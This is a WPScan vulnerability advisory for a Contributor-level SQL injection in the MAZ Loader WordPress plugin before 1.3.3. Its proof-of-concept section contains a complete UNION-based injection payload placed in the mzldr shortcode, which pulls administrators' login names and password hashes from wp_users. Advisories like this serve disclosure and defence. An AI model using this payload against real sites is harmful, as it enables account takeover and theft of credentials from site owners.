WordPress Plugin Vulnerabilities
MAZ Loader < 1.3.3 - Contributor+ SQL Injection
Description
The plugin does not validate or escape the loader_id parameter of the mzldr shortcode, which allows users with a role as low as Contributor to perform SQL injection.
Proof of Concept
As a user with a role as low as Contributor, put the following shortcode in a page/post and view/preview it to get the login name:password hash pair of the first user in the database (generally admin).
[mzldr loader_id="12345 UNION SELECT 0,1,'SQLi',CONCAT(FROM_BASE64('eyJkYXRhIjp7IjEiOnsiaWQiOjEsInR5cGUiOiJ0ZXh0IiwidGV4dCI6Ig=='),user_login,':',user_pass,FROM_BASE64('Iiwic2l6ZSI6MTAwLCJiYWNrZ3JvdW5kIjoiIiwiY29sb3IiOiIiLCJwYWRkaW5nX3RvcCI6MCwicGFkZGluZ19yaWdodCI6MCwicGFkZGluZ19ib3R0b20iOjAsInBhZGRpbmdfbGVmdCI6MCwicGFkZGluZ19saW5rIjoiYWxsIiwicGFkZGluZ190eXBlIjoicHgiLCJtYXJnaW5fdG9wIjowLCJtYXJnaW5fcmlnaHQiOjAsIm1hcmdpbl9ib3R0b20iOjAsIm1hcmdpbl9sZWZ0IjowLCJtYXJnaW5fbGluayI6ImFsbCIsIm1hcmdpbl90eXBlIjoicHgifX0sInNldHRpbmdzIjp7Im1pbmltdW1fbG9hZGluZ190aW1lIjoyMDAwLCJkdXJhdGlvbiI6MTAwMCwiZGVsYXkiOjAsInNob3dfb25faG9tZXBhZ2UiOiJvZmYifSwiYXBwZWFyYW5jZSI6eyJiYWNrZ3JvdW5kX2NvbG9yIjoiI2RkOTkzMyIsImJhY2tncm91bmQiOiIiLCJiYWNrZ3JvdW5kX2ltYWdlX3R5cGUiOiJjb3ZlciIsImJhY2tncm91bmRfaW1hZ2VfcG9zaXRpb24iOiJjZW50ZXJfY2VudGVyIiwiYmFja2dyb3VuZF9jb2xvcl9vdmVybGF5IjoiIiwiY29udGVudF9wb3NpdGlvbiI6ImNlbnRlciIsIml0ZW1zX3NpZGVfYnlfc2lkZSI6Im9mZiIsImRpc2FibGVfcGFnZV9zY3JvbGwiOiJvbiJ9LCJjdXN0b21fY29kZSI6IiIsInB1Ymxpc2hfc2V0dGluZ3MiOiIifQ==')),1,'2021-08-24 00:00:00',NULL,1 FROM wp_users UNION SELECT *, 1 FROM wp_mzldr_loaders WHERE 0=1"]
Affects Plugins
Fixed in 1.3.3 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-11 (about 2 years ago)
Added
2021-10-11 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)
WPScan 